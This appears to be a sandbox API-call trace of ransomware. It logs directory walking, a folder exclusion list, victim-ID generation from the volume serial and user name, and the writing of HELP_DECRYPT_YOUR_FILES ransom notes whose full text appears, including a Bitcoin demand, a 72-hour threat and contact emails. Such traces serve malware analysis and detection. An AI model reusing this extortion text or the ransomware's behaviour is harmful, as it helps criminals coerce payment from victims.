	[0166.908] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.908] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0166.908] CloseHandle (hObject=0x390) returned 1
	[0166.909] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d024bd4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.909] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*") returned 57
	[0166.909] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.910] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\PCPKSP\\WindowsAIK\\*.*", cchLength=0x39 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\*.*") returned 0x39
	[0166.910] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.910] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\pcpksp\\windowsaik\\*.*", lpSrch="windows") returned="windowsaik\\*.*"
	[0166.910] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.910] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsAIK", cAlternateFileName="WINDOW~1")) returned 0
	[0166.910] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.910] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.911] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1
	[0166.911] lstrcmpW (lpString1="RSA", lpString2="..") returned 1
	[0166.911] lstrcmpW (lpString1="RSA", lpString2=".") returned 1
	[0166.911] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0166.911] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\"
	[0166.912] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="RSA" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA"
	[0166.912] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA"
	[0166.912] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\"
	[0166.912] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\"
	[0166.912] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*"
	[0166.912] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.913] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned 43
	[0166.913] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.913] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*") returned 0x2b
	[0166.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.913] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="windows") returned 0x0
	[0166.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.913] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="boot") returned 0x0
	[0166.913] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.914] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="system volume information") returned 0x0
	[0166.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.914] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.914] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="temp") returned 0x0
	[0166.914] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.914] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="program files") returned 0x0
	[0166.915] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.915] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.915] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.915] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="appdata") returned 0x0
	[0166.915] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.915] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="application data") returned 0x0
	[0166.915] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.916] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="winnt") returned 0x0
	[0166.916] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.916] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="tmp") returned 0x0
	[0166.916] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.916] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="cache") returned 0x0
	[0166.916] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.916] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.916] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.917] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="webcache") returned 0x0
	[0166.917] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.917] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="inetcache") returned 0x0
	[0166.917] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.917] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="nvidia") returned 0x0
	[0166.917] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.917] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="packages") returned 0x0
	[0166.917] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.918] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="cookies") returned 0x0
	[0166.918] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.918] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="programdata") returned 0x0
	[0166.918] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc4a8a1, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.918] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1
	[0166.918] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1
	[0166.918] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 0
	[0166.918] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.919] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.919] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA"
	[0166.919] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*"
	[0166.919] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.920] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.920] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\HELP_DECRYPT_YOUR_FILES.TXT") returned 67
	[0166.920] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.920] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.920] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.930] CloseHandle (hObject=0x388) returned 1
	[0166.931] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.932] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.932] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0166.933] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.933] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.934] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.934] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.934] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0166.934] CloseHandle (hObject=0x388) returned 1
	[0166.935] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.935] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.935] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.935] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\HELP_DECRYPT_YOUR_FILES.HTML") returned 68
	[0166.935] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.940] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.941] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0166.944] CloseHandle (hObject=0x388) returned 1
	[0166.945] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.945] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.946] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0166.948] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.948] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.948] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.948] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.948] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0166.949] CloseHandle (hObject=0x388) returned 1
	[0166.949] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x7d097231, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.950] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*") returned 43
	[0166.950] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.950] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*") returned 0x2b
	[0166.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.950] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="windows") returned 0x0
	[0166.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.950] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="boot") returned 0x0
	[0166.950] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.951] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="system volume information") returned 0x0
	[0166.951] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.951] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.951] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.951] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="temp") returned 0x0
	[0166.951] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.952] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="program files") returned 0x0
	[0166.952] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.952] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.952] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.952] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="appdata") returned 0x0
	[0166.952] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.952] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="application data") returned 0x0
	[0166.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.953] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="winnt") returned 0x0
	[0166.953] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.954] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="tmp") returned 0x0
	[0166.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.954] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="cache") returned 0x0
	[0166.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.954] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.954] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.954] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="webcache") returned 0x0
	[0166.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.955] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="inetcache") returned 0x0
	[0166.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.955] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="nvidia") returned 0x0
	[0166.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.955] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="packages") returned 0x0
	[0166.955] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.956] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="cookies") returned 0x0
	[0166.956] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.956] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\*.*", lpSrch="programdata") returned 0x0
	[0166.956] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.956] lstrcmpW (lpString1=".", lpString2=".") returned 0
